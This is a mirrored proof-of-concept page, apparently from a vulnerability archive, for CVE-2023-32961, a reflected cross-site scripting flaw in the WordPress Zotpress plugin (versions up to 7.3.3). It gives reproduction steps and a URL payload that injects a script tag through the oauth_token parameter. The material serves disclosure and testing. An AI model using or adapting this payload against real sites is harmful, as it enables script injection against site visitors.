目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2023-32961 PoC — WordPress Plugin Katie Seaborn Zotpress 跨站脚本漏洞

来源
https://github.com/LOURC0D3/CVE-2023-32961
关联漏洞
标题:WordPress Plugin Katie Seaborn Zotpress 跨站脚本漏洞 (CVE-2023-32961)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Katie Seaborn Zotpress 7.3.3及之前版本存在跨站脚本漏洞。攻击者利用该漏洞执行跨站脚本(XSS)攻击。
Description
PoC of CVE-2023-32961
介绍
# CVE-2023-32961

This repository is about XSS vulnerability in Wordpress Zotpress Plugin.

## Component details

---

### Component name

Zotpress

### Vulnerable version

≤ 7.3.3

### Component slug

zotpress

### Component link

https://wordpress.org/plugins/zotpress/

## Pre-requisite

---

Unauthenticated

## Vulenerability details

---

### Short description

`get_request_token` function in `zotpress/lib/admin/admin.accounts.oauth.php` is vulnerable to a XSS attack.

### How to reproduce (PoC)

1. Install the oauth php extension to trigger the vulnerability. (This is Zotpress's optional)
2. Login to [zotero.org](http://zotero.org/)
3. Conditions must be met for the `get_request_token` function to execute. (first time only)
Send a payload like this: `http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1`
4. Send a below payload
`http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>`

### Additional information

- You need a [zotero.org](http://zotero.org/) account.
- You need to set the oauthState value to 1 to trigger it. If the above payload doesn't work, you need to find a way to set oauthState to 1.
    - conditional expression :
        
        ```php
        $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
        ```
        
- Easy to install php oauth extension:
    - One Line Command :
        
        ```bash
        sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
        ```
        
- Tested in wordpress:latest Docker image.

### PoC Video

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

## References

---

[CVE-2023-32961](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32961)
文件快照

 [4.0K]  /data/pocs/f2bfc45f3452031af6d88b8704f5b603a60c3558
└── [1.9K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。